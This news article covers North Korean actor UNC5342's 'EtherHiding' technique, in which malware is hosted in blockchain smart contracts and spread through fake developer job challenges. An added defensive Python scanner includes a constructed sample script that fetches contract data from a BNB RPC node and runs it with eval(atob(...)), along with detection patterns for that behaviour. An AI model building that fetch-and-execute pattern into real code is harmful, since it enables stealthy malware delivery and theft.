- UNC5342 uses blockchain smart contracts to spread crypto-stealing malware via EtherHiding.
- Fake jobs and coding challenges trick developers into triggering the JadeSnow loader and backdoor.
- Blockchain immutability makes malware hosting resilient.
North Korean state-sponsored threat actors are now using public blockchains to host malicious code and deploy malware to target endpoints.
This is according to Google’s Threat Intelligence Group (GTIG), which said it observed UNC5342 using Ethereum and BNB to host droppers and ultimately deploy cryptocurrency-stealing malware against software and blockchain developers.
The technique is called EtherHiding. Instead of sending a malicious file directly to the victim (or tricking them into downloading it), the attackers encode parts of the malware into blockchain transactions and smart contracts.
Evolution of foolproof hosting
The smart contract itself doesn’t automatically run malware on someone’s computer, but it can provide instructions or code when a user interacts with it (when clicking a link, running a script, or connecting a crypto wallet).
The blockchain is a great place to store and distribute malware because it is public, immutable, and almost impossible to tamper with.
“This represents an evolution toward next-generation, foolproof hosting,” Google said, noting that the resilient nature of blockchain is what makes it so attractive to cybercriminals.
Starting in February, UNC5342 was observed creating fake jobs and coding challenges, tricking developers and others working in the Web3 space into running different files. These files connect to the blockchain and retrieve code which, in turn, installs the JadeSnow loader. This loader drops the InvisibleFerret backdoor, which has previously been observed in cryptocurrency thefts.
This isn’t the first time we’ve seen blockchain used to spread malware. The technique has been in use since 2023, and in the same report Google also mentions a financially motivated actor, UNC5142, using the same technique.
This group has been seen compromising WordPress sites to host malicious JavaScript code connected to the blockchain. So far, more than 14,000 infected sites have been discovered.
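The pattern described above, a script that reads data from a smart contract through a public RPC node and then executes what it retrieved, is what a defender can look for in JavaScript served by a site like the compromised WordPress installs mentioned here. The following scanner is an added illustration, not code from Google's report or from either threat group; its indicator patterns are generic heuristics I have chosen, and the three sample scripts (including the contract addresses and RPC URL) are constructed for the demo, not real indicators.

```python
import re

# Heuristic indicator sets (assumed for illustration, not indicators from the GTIG report).
# The core EtherHiding pattern is: read chain data + a contract address + dynamic execution.
RPC_PATTERNS = [
    r"bsc-dataseed\d*\.binance\.org",   # public BNB Smart Chain RPC nodes
    r"infura\.io",                       # common Ethereum RPC provider
    r"\beth_call\b",                     # JSON-RPC read of contract state
    r"\beth_getStorageAt\b",
]
LIBRARY_PATTERNS = [r"\bethers\b", r"\b[Ww]eb3\b"]
CONTRACT_ADDR = re.compile(r"0x[0-9a-fA-F]{40}")
DECODE_PATTERNS = [r"\batob\s*\(", r"fromCharCode", r"toUtf8String|hexToUtf8|fromHex"]
EXEC_PATTERNS = [r"\beval\s*\(", r"new\s+Function\s*\(", r"document\.write\s*\(", r"\.innerHTML\s*="]


def score_script(src):
    """Return a dict with the indicator categories hit and an overall verdict."""
    findings = []

    def hit(label, patterns):
        if any(re.search(p, src) for p in patterns):
            findings.append(label)
            return True
        return False

    reads_chain = hit("rpc_endpoint_or_call", RPC_PATTERNS)
    uses_lib = hit("web3_library", LIBRARY_PATTERNS)
    has_addr = bool(CONTRACT_ADDR.search(src))
    if has_addr:
        findings.append("contract_address")
    hit("payload_decode", DECODE_PATTERNS)
    executes = hit("dynamic_execution", EXEC_PATTERNS)

    # A dapp that reads a contract is normal; one that evals what it read is not.
    suspicious = (reads_chain or uses_lib) and has_addr and executes
    return {"suspicious": suspicious, "findings": findings}


def scan_all(scripts):
    """scripts: mapping of filename -> JS source. Returns the names flagged as suspicious."""
    return [name for name, src in scripts.items() if score_script(src)["suspicious"]]


# Constructed sample scripts (not real samples): one benign dapp, one loader-like
# snippet with a placeholder address and no real payload, and one ordinary theme script.
SAMPLES = {
    "dapp.js": """
        import { ethers } from "ethers";
        const provider = new ethers.JsonRpcProvider("https://mainnet.infura.io/v3/PLACEHOLDER_KEY");
        const token = new ethers.Contract("0x1234567890abcdef1234567890abcdef12345678", abi, provider);
        document.getElementById("bal").textContent = await token.balanceOf(user);
    """,
    "inject.js": """
        fetch("https://bsc-dataseed1.binance.org/", {method: "POST", body: JSON.stringify({
            jsonrpc: "2.0", id: 1, method: "eth_call",
            params: [{to: "0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef", data: "0x"}, "latest"]})})
          .then(r => r.json()).then(j => eval(atob(j.result)));
    """,
    "theme.js": "jQuery(function($){ $('.menu').on('click', toggleMenu); });",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, score_script(src))
    print("flagged:", scan_all(SAMPLES))
```

The verdict deliberately requires all three elements together. Reading contract state alone is what every legitimate dapp front-end does, so alerting on a web3 library or an RPC endpoint by itself would drown a WordPress operator in false positives; it is the combination with `eval`/`new Function` on decoded data that separates a loader from a wallet widget. Because the payload itself lives on-chain and can be swapped by the contract owner, scanning the served JavaScript (and diffing it against the theme's known-good files) is more durable than blocking any particular payload hash.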
North Korea is known for targeting the crypto industry and using stolen funds to finance its weapons program and state apparatus.
Via The file